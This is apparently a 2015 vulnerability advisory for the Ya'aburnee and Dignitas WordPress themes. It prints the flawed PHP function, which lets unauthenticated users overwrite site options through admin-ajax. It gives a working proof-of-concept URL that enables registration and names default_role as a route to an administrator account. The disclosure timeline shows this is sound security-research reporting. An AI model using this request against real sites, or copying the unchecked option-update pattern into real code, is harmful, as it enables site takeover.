Home / os / blackberry
WordPress Ya'aburnee / Dignitas Privilege Escalation
Posted on 05 March 2015
------------------------------------------------------------------------------ WordPress Different-Themes Previlage Escalation ------------------------------------------------------------------------------ [-] Vulnerability Author: @Evex_1337 [-] Themes Affected: Ya'aburnee Dignitas [-] Themes Link: http://themeforest.net/item/yaaburnee-magazine-ecommerce-theme/6662982http://themeforest.net/item/dignitas-hotel-apartment-responsive-theme/5073713 [-] Affected Version: Version: 1.1.9 (Dignitas) Version: 1.0.7 (Ya'aburnee) [-] Vulnerability Description: This vulnerability allows an attacker to escalate previleges on the site and have an admin account which may lead to a full site takeover the vulnerability is in function "df_save_options": function df_save_options() { $fields = $_REQUEST; foreach($fields as $key => $field) { if($key!="action") { echo $key."-".$field; update_option($key,$field); } } die(); } passing user input into the update_option function allows an attacker to update options like users_can_register,default_role.... etc this can be accessed via ajax by users and non-users: add_action('wp_ajax_nopriv_df_save_options', 'df_save_options'); add_action('wp_ajax_df_save_options', 'df_save_options'); [-] Proof of Concept: this will enable user registrationhttp://localhost/x/wordpress/wp-admin/admin-ajax.php?action=df_save_options&users_can_register=1 [-] Timeline: 03 March - Vendor Notified 04 March - Fix Released 04 March - Public Disclosure
